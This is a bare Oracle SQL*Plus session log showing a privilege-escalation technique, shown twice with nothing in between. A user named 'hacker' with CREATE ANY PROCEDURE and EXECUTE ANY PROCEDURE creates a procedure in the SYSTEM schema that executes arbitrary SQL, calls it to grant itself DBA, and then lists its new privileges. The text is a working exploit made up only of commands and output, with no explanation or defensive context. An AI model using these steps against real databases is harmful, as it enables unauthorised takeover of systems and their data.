SQL> conn / as sysdba
Connected.
SQL> create user hacker identified by bbk_12345;
User created.
SQL> grant create session to hacker;
Grant succeeded.
SQL> grant create any procedure, execute any procedure to hacker;
Grant succeeded.
SQL> conn hacker/bbk_12345
Connected.
SQL> create procedure system.h1(h1_str in varchar2) as
2begin
3execute immediate h1_str;
4end;
5/
Procedure created.
SQL> execute system.h1('grant dba to hacker');
PL/SQL procedure successfully completed.
SQL> conn hacker/bbk_12345
Connected.
SQL> select * from session_privs;
PRIVILEGE
----------------------------------------
ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION
RESTRICTED SESSION
CREATE TABLESPACE
ALTER TABLESPACE
MANAGE TABLESPACE
DROP TABLESPACE
UNLIMITED TABLESPACE
CREATE USER
......
161 rows selected.
搞定
Connected.
SQL> create user hacker identified by bbk_12345;
User created.
SQL> grant create session to hacker;
Grant succeeded.
SQL> grant create any procedure, execute any procedure to hacker;
Grant succeeded.
SQL> conn hacker/bbk_12345
Connected.
SQL> create procedure system.h1(h1_str in varchar2) as
2begin
3execute immediate h1_str;
4end;
5/
Procedure created.
SQL> execute system.h1('grant dba to hacker');
PL/SQL procedure successfully completed.
SQL> conn hacker/bbk_12345
Connected.
SQL> select * from session_privs;
PRIVILEGE
----------------------------------------
ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION
RESTRICTED SESSION
CREATE TABLESPACE
ALTER TABLESPACE
MANAGE TABLESPACE
DROP TABLESPACE
UNLIMITED TABLESPACE
CREATE USER
......
161 rows selected.
搞定